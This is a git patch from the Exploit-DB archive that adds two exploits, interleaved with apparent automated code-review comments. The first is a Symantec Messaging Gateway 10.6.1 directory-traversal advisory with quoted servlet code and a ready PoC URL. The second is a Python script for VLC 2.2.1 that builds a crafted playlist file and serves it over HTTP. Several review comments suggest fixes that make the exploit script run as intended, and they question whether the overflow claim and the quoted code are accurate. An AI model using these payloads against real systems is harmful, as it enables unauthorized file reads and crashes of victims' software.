From d86bdf5f80de1a24bdf35ba5d99798494f7d0c9e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 29 Sep 2016 05:01:16 +0000
Subject: [PATCH] DB: 2016-09-29
2 new exploits
Symantec Messaging Gateway 10.6.1 - Directory Traversal
VLC Media Player 2.2.1 - Buffer Overflow
---
 files.csv | 2 ++
 platforms/java/webapps/40437.txt | 53 ++++++++++++++++++++++++++++++++
 platforms/windows/dos/40439.py | 38 +++++++++++++++++++++++
 3 files changed, 93 insertions(+)
 create mode 100755 platforms/java/webapps/40437.txt
 create mode 100755 platforms/windows/dos/40439.py
diff --git a/files.csv b/files.csv
index 8c4747e46..610ad63e8 100755
--- a/files.csv
+++ b/files.csv
@@ -35268,6 +35268,7 @@ id,file,description,date,author,platform,type,port
 38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0
 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0
 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0
+40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0
 38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
 38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
 38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
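Review bot: The new `40437` row is inserted between the `38919` and `38920` entries instead of after the highest id, whereas the `40439` row in the next hunk is appended at the end, so `files.csv` is no longer id-ordered around this point. Every other visible row is in ascending id order, so if the index is expected to stay sorted the `40437` line should move to the end of the file next to `40439`; if ordering is not significant, a short comment to that effect at the top of the file would stop the question recurring.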
@@ -36559,3 +36560,4 @@ id,file,description,date,author,platform,type,port
 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
 40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - Stagefright .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
+40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
diff --git a/platforms/java/webapps/40437.txt b/platforms/java/webapps/40437.txt
new file mode 100755
index 000000000..52db53e05
--- /dev/null
+++ b/platforms/java/webapps/40437.txt
@@ -0,0 +1,53 @@
+# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
+# Date : 28/09/2016
+# Author : R-73eN
+# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
+# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
+# Vendor : Symantec
+# CVE : CVE-2016-5312
+# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
+#
+# ___ __ ____ _ _
+# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
+# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
+# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
+# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
+#
+#
+# DESCRIPTION:
+#
+# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
+# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
+# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
+#
+The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
+The vulnerable code is
+extends HttpServlet {
+ public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
+ block6 : {
+ try {
+ String string = httpServletRequest.getParameter("sn");
+ //**** Taking parameter "sn" and writing it to the "string variable"
+
+
+ if (string == null) break block6;
+ String string2 = string.substring(string.length() - 3);
+
+ byte[] arrby = (byte[])this.getServletContext().getAttribute(string);
+
+ //**** The string variable is passed here without any sanitanization for directory traversal
+ //**** and you can successfully use this to do a directory traversal.
+
+ if (arrby != null) {
+ httpServletResponse.setContentType("image/" + string2);
+ ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
+ httpServletResponse.setContentLength(arrby.length);
+ servletOutputStream.write(arrby);
+ this.getServletContext().removeAttribute(string);
+ break block6;
+ }
+
+
+POC:
+https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
+
diff --git a/platforms/windows/dos/40439.py b/platforms/windows/dos/40439.py
new file mode 100755
index 000000000..83ddebc46
--- /dev/null
+++ b/platforms/windows/dos/40439.py
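Review bot: The comment under `byte[] arrby = (byte[])this.getServletContext().getAttribute(string);` says the `sn` value reaches the filesystem unsanitised, but `ServletContext.getAttribute` is an in-memory attribute lookup and nothing in the quoted `doGet` opens or reads a file, so the lines shown do not on their own demonstrate the traversal. The advisory would be stronger if it quoted or named the code path that stores file contents under the `sn` key (presumably elsewhere in the charting servlet, not in this excerpt), or stated plainly that the behaviour was confirmed against 10.6.1 as the `Tested on` header implies. Two smaller points on the text: `sanitanization` should read `sanitization`, and the response `Content-Type` is built from the last three characters of the same unvalidated parameter (`"image/" + string2`), which a complete fix should cover as well as the path handling. The quoted `doGet` is truncated — the `catch` and closing braces are missing — which is worth saying in the advisory so readers do not look for them.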
@@ -0,0 +1,38 @@
+Exploit Title: VLC Media Player 2.2.1 Buffer Overflow
+2016-09-28
+Author: sultan albalawi
+Software Link: https://www.videolan.org/vlc/releases/2.2.1.html
+Tested on:win7
+video :https://www.facebook.com/pentest3/videos/vb.100012552940568/189735791454851/?type=2&theater¬if_t=video_processed¬if_id=1475012468070044
+
+*************************************************************************************
+filecreate = "payload.wmv" # create file (payload.wmv)
+buffer = ("\x23\x45\x58\x54\x4d\x33\x55\r\n\x23"+
+"\x45\x58\x54\x2d\x58\x2d\x53\x54\x52"+
+"\x45\x41\x4d\x2d\x49\x4e\x46\x3a\x50"+
+"\x52\x4f\x47\x52\x41\x4d\x2d\x49\x44"+
+"\x3d\x31\x2c\x42\x41\x4e\x44\x57\x49"+
+"\x44\x54\x48\x3d\x31\x2c\x52\x45\x53"+
+"\x4f\x4c\x55\x54\x49\x4f\x4e\x3d\x31"+
+"\x32\x30\x78\x33\x36\x30\r\n")
+buffer += filecreate
+open(filecreate, "wb").write(buffer)
+print "create file done {}".format(filecreate)
+import BaseHTTPServer
+import sys
+from SimpleHTTPServer import SimpleHTTPRequestHandler
+HandlerClass = SimpleHTTPRequestHandler
+ServerClass = BaseHTTPServer.HTTPServer
+Protocol = "HTTP/1.0"
+if sys.argv[1:]:
+ port = int(sys.argv[1])
+else:
+ port =8080
+server_address = ('192.168.100.3',8080)
+HandlerClass.protocol_version = Protocol
+httpd = ServerClass(server_address, HandlerClass)
+sa = httpd.socket.getsockname()
+print sa[0],sa[1],filecreate
+print "open vlc and open file {}".format(filecreate)
+print "LISTENING..",sa[0],sa[1],filecreate
+httpd.serve_forever()
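Review bot: `port` is parsed from `sys.argv` but never used — `server_address = ('192.168.100.3',8080)` hardcodes both the interface and the port, so the whole `if sys.argv[1:]` branch is dead code; the tuple should read `server_address = ('192.168.100.3', port)`. `open(filecreate, "wb").write(buffer)` leaves the handle to the garbage collector, and `with open(filecreate, "wb") as f: f.write(buffer)` would close it deterministically before the server starts handing the file out. The script is Python 2 only (`print` statements, `BaseHTTPServer`, `SimpleHTTPServer`), which the header should state next to `Tested on:win7`. The `video :` URL in the header has had `&notif_t` and `&notif_id` HTML-decoded into `¬if_t` / `¬if_id`, so the link as committed is broken. On classification, the escaped bytes decode to an HLS playlist (`#EXTM3U` … `RESOLUTION=120x360`) followed by the playlist's own filename, so the trigger looks like a self-referencing playlist rather than an over-long field, and the `Buffer Overflow` title — which is copied verbatim into the `files.csv` description — is worth confirming in a debugger before it is relied on.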